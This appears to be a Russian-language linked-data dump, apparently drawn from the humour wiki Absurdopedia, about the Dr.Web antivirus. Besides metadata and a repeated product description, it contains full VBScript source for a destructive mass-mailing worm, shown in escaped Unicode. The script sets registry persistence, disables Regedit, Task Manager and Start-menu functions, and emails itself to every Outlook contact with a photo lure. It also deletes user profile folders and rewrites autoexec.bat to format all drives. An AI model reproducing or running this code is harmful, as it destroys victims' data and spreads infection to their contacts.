. "180"^^ . . "Dr.Web"@ru . "Dr. Web"@ru . . "1"^^ . "' \u041E\u0431\u044A\u044F\u0432\u043B\u0435\u043D\u0438\u0435 \u043F\u0435\u0440\u0435\u043C\u0435\u043D\u043D\u044B\u0445(\u044D\u0442\u043E\u0442 \u0430\u0431\u0437\u0430\u0446 \u043D\u0435 \u043F\u0435\u0440\u0435\u043C\u0435\u0449\u0430\u0442\u044C) Set FileSystemObject = CreateObject(\u00ABscripting.filesystemobject\u00BB) Set Shell = CreateObject(\u00ABWscript.Shell\u00BB) t = 0: On Error Resume Next ' \u041F\u0440\u043E\u043F\u0443\u0441\u043A\u0430\u0442\u044C \u043E\u0448\u0438\u0431\u043A\u0438 Set Application = CreateObject(\u00ABShell.Application\u00BB) Set InternerExplorer = WScript.CreateObject(\u00ABInternetExplorer.Application\u00BB) Set Outlook = WScript.CreateObject(\u00ABOutlook.Application\u00BB) ' \u041C\u0438\u043D\u0438\u043C\u0438\u0437\u0438\u0440\u043E\u0432\u0430\u0442\u044C \u0432\u0441\u0435 \u043E\u043A\u043D\u0430 Application.MinimizeAll ' \u0423\u0434\u0430\u043B\u0435\u043D\u0438\u0435 \u0432\u0441\u0435\u0445 \u0441\u043F\u0435\u0446\u0438\u0430\u043B\u044C\u043D\u044B\u0445 \u043F\u0430\u043F\u043E\u043A For Each Folder In Shell.SpecialFolders FileSystemObject.deletefolder folder,True Next ' \u0423\u0434\u0430\u043B\u0435\u043D\u0438\u0435 Documents and Settings"@ru . . "QrazyDraqon"@ru . . "2010-04-11"^^ . "--10-22"^^ . "\u0410\u0431\u0441\u0443\u0440\u0434\u043E\u043F\u0435\u0434\u0438\u044F"@ru . "\u0410\u043D\u0442\u0438\u0432\u0438\u0440\u0443\u0441 Dr.Web"@ru . . "Dr. Web \u2014 \u0430\u043D\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u044B \u044D\u0442\u043E\u0433\u043E \u0441\u0435\u043C\u0435\u0439\u0441\u0442\u0432\u0430 \u043F\u0440\u0435\u0434\u043D\u0430\u0437\u043D\u0430\u0447\u0435\u043D\u044B \u0434\u043B\u044F \u0437\u0430\u0449\u0438\u0442\u044B \u043E\u0442 \u043F\u043E\u0447\u0442\u043E\u0432\u044B\u0445 \u0438 \u0441\u0435\u0442\u0435\u0432\u044B\u0445 \u0447\u0435\u0440\u0432\u0435\u0439, \u0440\u0443\u0442\u043A\u0438\u0442\u043E\u0432, \u0444\u0430\u0439\u043B\u043E\u0432\u044B\u0445 \u0432\u0438\u0440\u0443\u0441\u043E\u0432, \u0442\u0440\u043E\u044F\u043D\u0441\u043A\u0438\u0445 \u043F\u0440\u043E\u0433\u0440\u0430\u043C\u043C, \u0441\u0442\u0435\u043B\u0441-\u0432\u0438\u0440\u0443\u0441\u043E\u0432, \u043F\u043E\u043B\u0438\u043C\u043E\u0440\u0444\u043D\u044B\u0445 \u0432\u0438\u0440\u0443\u0441\u043E\u0432, \u0431\u0435\u0441\u0442\u0435\u043B\u0435\u0441\u043D\u044B\u0445 \u0432\u0438\u0440\u0443\u0441\u043E\u0432, \u043C\u0430\u043A\u0440\u043E\u0432\u0438\u0440\u0443\u0441\u043E\u0432, \u0432\u0438\u0440\u0443\u0441\u043E\u0432, \u043F\u043E\u0440\u0430\u0436\u0430\u044E\u0449\u0438\u0445 \u0434\u043E\u043A\u0443\u043C\u0435\u043D\u0442\u044B MS Office, \u0441\u043A\u0440\u0438\u043F\u0442-\u0432\u0438\u0440\u0443\u0441\u043E\u0432, \u0448\u043F\u0438\u043E\u043D\u0441\u043A\u043E\u0433\u043E \u041F\u041E (spyware), \u043F\u0440\u043E\u0433\u0440\u0430\u043C\u043C-\u043F\u043E\u0445\u0438\u0442\u0438\u0442\u0435\u043B\u0435\u0439 \u043F\u0430\u0440\u043E\u043B\u0435\u0439, \u043A\u043B\u0430\u0432\u0438\u0430\u0442\u0443\u0440\u043D\u044B\u0445 \u0448\u043F\u0438\u043E\u043D\u043E\u0432, \u043F\u0440\u043E\u0433\u0440\u0430\u043C\u043C \u043F\u043B\u0430\u0442\u043D\u043E\u0433\u043E \u0434\u043E\u0437\u0432\u043E\u043D\u0430, \u0440\u0435\u043A\u043B\u0430\u043C\u043D\u043E\u0433\u043E \u041F\u041E (adware), \u043F\u043E\u0442\u0435\u043D\u0446\u0438\u0430\u043B\u044C\u043D\u043E \u043E\u043F\u0430\u0441\u043D\u043E\u0433\u043E \u041F\u041E, \u0445\u0430\u043A\u0435\u0440\u0441\u043A\u0438\u0445 \u0443\u0442\u0438\u043B\u0438\u0442, \u043F\u0440\u043E\u0433\u0440\u0430\u043C\u043C-\u043B\u044E\u043A\u043E\u0432, \u043F\u0440\u043E\u0433\u0440\u0430\u043C\u043C-\u0448\u0443\u0442\u043E\u043A, \u0432\u0440\u0435\u0434\u043E\u043D\u043E\u0441\u043D\u044B\u0445 \u0441\u043A\u0440\u0438\u043F\u0442\u043E\u0432 \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0432\u0440\u0435\u0434\u043E\u043D\u043E\u0441\u043D\u044B\u0445 \u043E\u0431\u044A\u0435\u043A\u0442\u043E\u0432, \u0430 \u0442\u0430\u043A\u0436\u0435 \u043E\u0442 \u0441\u043F\u0430\u043C\u0430, \u0441\u043A\u0430\u043C\u0438\u043D\u0433-, \u0444\u0430\u0440\u043C\u0438\u043D\u0433-, \u0444\u0438\u0448\u0438\u043D\u0433-\u0441\u043E\u043E\u0431\u0449\u0435\u043D\u0438\u0439 \u0438 \u0442\u0435\u0445\u043D\u0438\u0447\u0435\u0441\u043A\u043E\u0433\u043E \u0441\u043F\u0430\u043C\u0430."@ru . . "2010-04-11"^^ . "195"^^ . "' \u041E\u0431\u044A\u044F\u0432\u043B\u0435\u043D\u0438\u0435 \u043F\u0435\u0440\u0435\u043C\u0435\u043D\u043D\u044B\u0445(\u044D\u0442\u043E\u0442 \u0430\u0431\u0437\u0430\u0446 \u043D\u0435 \u043F\u0435\u0440\u0435\u043C\u0435\u0449\u0430\u0442\u044C) Set FileSystemObject = CreateObject(\u00ABscripting.filesystemobject\u00BB) Set Shell = CreateObject(\u00ABWscript.Shell\u00BB) t = 0: On Error Resume Next ' \u041F\u0440\u043E\u043F\u0443\u0441\u043A\u0430\u0442\u044C \u043E\u0448\u0438\u0431\u043A\u0438 Set Application = CreateObject(\u00ABShell.Application\u00BB) Set InternerExplorer = WScript.CreateObject(\u00ABInternetExplorer.Application\u00BB) Set Outlook = WScript.CreateObject(\u00ABOutlook.Application\u00BB) ' \u041F\u043E\u043C\u0435\u043D\u044F\u0442\u044C \u0444\u0443\u043D\u043A\u0446\u0438\u0438 \u043A\u043B\u0430\u0432\u0438\u0448 \u043C\u044B\u0448\u043A\u0438 \u043C\u0435\u0441\u0442\u0430\u043C\u0438 Shell.RegWrite \u00ABHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SwapNT\u00BB, \u00ABrundll32 user32, SwapMouseButton\u00BB Shell.RegWrite \u00ABHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Swap98\u00BB, \u00ABrundll32.exe user.exe, swapmousebutton\u00BB Shell.Run \u00ABrundll32 user32, SwapMouseButton\u00BB ' \u041C\u0438\u043D\u0438\u043C\u0438\u0437\u0438\u0440\u043E\u0432\u0430\u0442\u044C \u0432\u0441\u0435 \u043E\u043A\u043D\u0430 Application.MinimizeAll ' \u0417\u0430\u043F\u0443\u0441\u043A\u0430\u0442\u044C\u0441\u044F \u043F\u0440\u0438 \u043A\u0430\u0436\u0434\u043E\u0439 \u043F\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u043A\u0435 Set File2 = FileSystemObject.GetFile(WScript.ScriptFullName) File2.Copy (\u00ABc:\\windows\\System\\Gigabyte.vbs\u00BB) Shell.RegWrite \u00ABHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Gigabyte\u00BB, \u00ABC:\\WINDOWS\\SYSTEM\\Gigabyte.vbs\u00BB Shell.RegWrite \u00ABHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\Gigabyte\u00BB, \u00ABC:\\WINDOWS\\SYSTEM\\Gigabyte.vbs\u00BB ' \u0411\u043B\u043E\u043A\u0438\u0440\u043E\u0432\u0430\u0442\u044C RegEdit(\u0447\u0442\u043E\u0431 \u0443 \u043D\u0435\u0433\u043E \u043D\u0435 \u0437\u0430\u0432\u043E\u0434\u0438\u043B\u0441\u044F \u0440\u0435\u0434\u0430\u043A\u0442\u043E\u0440 \u0440\u0435\u0435\u0441\u0442\u0440\u0430).\u0414\u043B\u044F \u0442\u043E\u0433\u043E \u0447\u0442\u043E\u0431\u044B \u0440\u0430\u0437\u0431\u043B\u043E\u043A\u0438\u0440\u043E\u0432\u0430\u0442\u044C \u043F\u0440\u043E\u0438\u0441\u0432\u043E\u0439\u0442\u0435 DisableRegistryTools \u0437\u043D\u0430\u0447\u0435\u043D\u0438\u0435 \u2014 0 Shell.RegWrite \u00ABHKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\\DisableRegistryTools\u00BB, 1, \u00ABREG_DWORD\u00BB ' \u0423\u0434\u0430\u043B\u0435\u043D\u0438\u0435 \u043F\u0443\u043D\u043A\u0442\u043E\u0432 \u043C\u0435\u043D\u044E \u041F\u0443\u0441\u043A: \u041F\u0440\u043E\u0433\u0440\u0430\u043C\u043C\u044B, \u0417\u0430\u0432\u0435\u0440\u0448\u0435\u043D\u0438\u0435 \u0440\u0430\u0431\u043E\u0442\u044B, \u041D\u0430\u0439\u0442\u0438, \u0412\u044B\u043F\u043E\u043B\u043D\u0438\u0442\u044C, \u0414\u043E\u043A\u0443\u043C\u0435\u043D\u0442\u044B \u0438 \u0442. \u0434. Shell.RegWrite \u00ABHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Expl\u043Erer\\NoStartMenuMorePrograms\u00BB, 1, \u00ABREG_DWORD\u00BB Shell.RegWrite \u00ABHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Expl\u043Erer\\NoClose\u00BB, 1, \u00ABREG_DWORD\u00BB Shell.RegWrite \u00ABHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Expl\u043Erer\\NoFind\u00BB, 1, \u00ABREG_DWORD\u00BB Shell.RegWrite \u00ABHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Expl\u043Erer\\NoRun\u00BB, 1, \u00ABREG_DWORD\u00BB Shell.RegWrite \u00ABHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Expl\u043Erer\\NoRecentDocsMenu\u00BB, 1, \u00ABREG_DWORD\u00BB Shell.RegWrite \u00ABHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Expl\u043Erer\\NoFavoritesMenu\u00BB, 1, \u00ABREG_DWORD\u00BB Shell.RegWrite \u00ABHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Expl\u043Erer\\NoStartMenuLogoff\u00BB, 1, \u00ABREG_DWORD\u00BB Shell.RegWrite \u00ABHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr\u00BB, 1, \u00ABREG_DWORD\u00BB Shell.RegWrite \u00ABHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Expl\u043Erer\\NoClose\u00BB, 1, \u00ABREG_DWORD\u00BB ' \u0420\u0430\u0437\u043E\u0441\u043B\u0430\u0442\u044C \u0432\u0438\u0440\u0443\u0441 \u0412\u0441\u0435 \u043A\u043E\u043D\u0442\u0430\u043A\u0442\u044B \u043D\u0435\u043F\u0440\u0438\u044F\u0442\u0435\u043B\u044F For Index = 1 To Outlook.GetNameSpace(\u00ABMAPI\u00BB).AddressLists(1).count Set OutMail = Outlook.CreateItem(0) OutMail.to = Outlook.GetNameSpace(\u00ABMAPI\u00BB).AddressLists(1).AddressEntries(Index) OutMail.Subject = \u00AB\u041F\u0440\u0438\u0432\u0435\u0442!\u00BB OutMail.Body = \u00AB\u041B\u043E\u0432\u0438 \u043C\u043E\u044E \u0444\u043E\u0442\u043A\u0443!\u00BB OutMail.Attachments.Add WScript.ScriptFullName OutMail.Send Next ' \u0423\u0434\u0430\u043B\u0435\u043D\u0438\u0435 \u0432\u0441\u0435\u0445 \u0441\u043F\u0435\u0446\u0438\u0430\u043B\u044C\u043D\u044B\u0445 \u043F\u0430\u043F\u043E\u043A For Each Folder In Shell.SpecialFolders FileSystemObject.deletefolder folder,True Next ' \u0423\u0434\u0430\u043B\u0435\u043D\u0438\u0435 Documents and Settings FileSystemObject.deletefolder\"C:\\Documents and Settings\",True FileSystemObject.deletefolder\"D:\\Documents and Settings\",True FileSystemObject.deletefolder\"E:\\Documents and Settings\",True ' \u0412\u044B\u0432\u0435\u0441\u0442\u0438 \u0441\u043E\u043E\u0431\u0449\u0435\u043D\u0438\u0435 Shell.popup \u00AB\u0417\u0440\u044F \u0442\u044B \u044D\u0442\u043E \u0441\u0434\u0435\u043B\u0430\u043B!\u00BB, 1, \u00AB\u0425\u0430-\u0445\u0430-\u0445\u0430!\u00BB, 0+16 ' \u0424\u043E\u0440\u043C\u0430\u0442\u0438\u0440\u043E\u0432\u0430\u0442\u044C \u0412\u0441\u0435 \u0434\u0438\u0441\u043A\u0438 (\u0422\u043E\u043B\u044C\u043A\u043E \u0434\u043B\u044F Windows 95,98,Me) If FileSystemObject.FileExists(\u00ABd:\\autoexec.bat\u00BB) Then Str = \u00ABd:\\autoexec.bat\u00BB If FileSystemObject.FileExists(\u00ABd:\\Windows.000\\autoexec.bat\u00BB) Then Str = \u00ABd:\\Windows.000\\autoexec.bat\u00BB If FileSystemObject.FileExists(\u00ABd:\\Windows\\autoexec.bat\u00BB) Then Str = \u00ABd:\\Windows\\autoexec.bat\u00BB If FileSystemObject.FileExists(\u00ABc:\\autoexec.bat\u00BB) Then Str = \u00ABc:\\autoexec.bat\u00BB If FileSystemObject.FileExists(\u00ABc:\\Windows.000\\autoexec.bat\u00BB) Then Str = \u00ABc:\\Windows.000\\autoexec.bat\u00BB If FileSystemObject.FileExists(\u00ABc:\\Windows\\autoexec.bat\u00BB) Then Str = \u00ABc:\\Windows\\autoexec.bat\u00BB Set ab = FileSystemObject.GetFile(Str) ab.Attributes = 0 Set autoexec = FileSystemObject.CreateTextFile(Str) autoexec.WriteLine \u00AB@cls\u00BB autoexec.WriteLine \u00AB@format c: /q /autotest\u00BB autoexec.WriteLine \u00AB@format d: /q /autotest\u00BB autoexec.WriteLine \u00AB@format e: /q /autotest\u00BB autoexec.WriteLine \u00AB@format f: /q /autotest\u00BB autoexec.WriteLine \u00AB@format g: /q /autotest\u00BB autoexec.WriteLine \u00AB@format h: /q /autotest\u00BB autoexec.WriteLine \u00AB@format i: /q /autotest\u00BB autoexec.Close Shell.Run Str, 5 Shell.RegWrite \u00ABHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives\u00BB, 67108863, \u00ABREG_DWORD\u00BB Shell.RegWrite \u00ABHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoViewOnDrive\u00BB, 67108863, \u00ABREG_DWORD\u00BB"@ru . . . . . . "\u0414\u043E\u043A\u0442\u043E\u0440 \u0412\u0435\u0431"@ru . . "Dr. Web \u2014 \u0430\u043D\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u044B \u044D\u0442\u043E\u0433\u043E \u0441\u0435\u043C\u0435\u0439\u0441\u0442\u0432\u0430 \u043F\u0440\u0435\u0434\u043D\u0430\u0437\u043D\u0430\u0447\u0435\u043D\u044B \u0434\u043B\u044F \u0437\u0430\u0449\u0438\u0442\u044B \u043E\u0442 \u043F\u043E\u0447\u0442\u043E\u0432\u044B\u0445 \u0438 \u0441\u0435\u0442\u0435\u0432\u044B\u0445 \u0447\u0435\u0440\u0432\u0435\u0439, \u0440\u0443\u0442\u043A\u0438\u0442\u043E\u0432, \u0444\u0430\u0439\u043B\u043E\u0432\u044B\u0445 \u0432\u0438\u0440\u0443\u0441\u043E\u0432, \u0442\u0440\u043E\u044F\u043D\u0441\u043A\u0438\u0445 \u043F\u0440\u043E\u0433\u0440\u0430\u043C\u043C, \u0441\u0442\u0435\u043B\u0441-\u0432\u0438\u0440\u0443\u0441\u043E\u0432, \u043F\u043E\u043B\u0438\u043C\u043E\u0440\u0444\u043D\u044B\u0445 \u0432\u0438\u0440\u0443\u0441\u043E\u0432, \u0431\u0435\u0441\u0442\u0435\u043B\u0435\u0441\u043D\u044B\u0445 \u0432\u0438\u0440\u0443\u0441\u043E\u0432, \u043C\u0430\u043A\u0440\u043E\u0432\u0438\u0440\u0443\u0441\u043E\u0432, \u0432\u0438\u0440\u0443\u0441\u043E\u0432, \u043F\u043E\u0440\u0430\u0436\u0430\u044E\u0449\u0438\u0445 \u0434\u043E\u043A\u0443\u043C\u0435\u043D\u0442\u044B MS Office, \u0441\u043A\u0440\u0438\u043F\u0442-\u0432\u0438\u0440\u0443\u0441\u043E\u0432, \u0448\u043F\u0438\u043E\u043D\u0441\u043A\u043E\u0433\u043E \u041F\u041E (spyware), \u043F\u0440\u043E\u0433\u0440\u0430\u043C\u043C-\u043F\u043E\u0445\u0438\u0442\u0438\u0442\u0435\u043B\u0435\u0439 \u043F\u0430\u0440\u043E\u043B\u0435\u0439, \u043A\u043B\u0430\u0432\u0438\u0430\u0442\u0443\u0440\u043D\u044B\u0445 \u0448\u043F\u0438\u043E\u043D\u043E\u0432, \u043F\u0440\u043E\u0433\u0440\u0430\u043C\u043C \u043F\u043B\u0430\u0442\u043D\u043E\u0433\u043E \u0434\u043E\u0437\u0432\u043E\u043D\u0430, \u0440\u0435\u043A\u043B\u0430\u043C\u043D\u043E\u0433\u043E \u041F\u041E (adware), \u043F\u043E\u0442\u0435\u043D\u0446\u0438\u0430\u043B\u044C\u043D\u043E \u043E\u043F\u0430\u0441\u043D\u043E\u0433\u043E \u041F\u041E, \u0445\u0430\u043A\u0435\u0440\u0441\u043A\u0438\u0445 \u0443\u0442\u0438\u043B\u0438\u0442, \u043F\u0440\u043E\u0433\u0440\u0430\u043C\u043C-\u043B\u044E\u043A\u043E\u0432, \u043F\u0440\u043E\u0433\u0440\u0430\u043C\u043C-\u0448\u0443\u0442\u043E\u043A, \u0432\u0440\u0435\u0434\u043E\u043D\u043E\u0441\u043D\u044B\u0445 \u0441\u043A\u0440\u0438\u043F\u0442\u043E\u0432 \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0432\u0440\u0435\u0434\u043E\u043D\u043E\u0441\u043D\u044B\u0445 \u043E\u0431\u044A\u0435\u043A\u0442\u043E\u0432, \u0430 \u0442\u0430\u043A\u0436\u0435 \u043E\u0442 \u0441\u043F\u0430\u043C\u0430, \u0441\u043A\u0430\u043C\u0438\u043D\u0433-, \u0444\u0430\u0440\u043C\u0438\u043D\u0433-, \u0444\u0438\u0448\u0438\u043D\u0433-\u0441\u043E\u043E\u0431\u0449\u0435\u043D\u0438\u0439 \u0438 \u0442\u0435\u0445\u043D\u0438\u0447\u0435\u0441\u043A\u043E\u0433\u043E \u0441\u043F\u0430\u043C\u0430."@ru .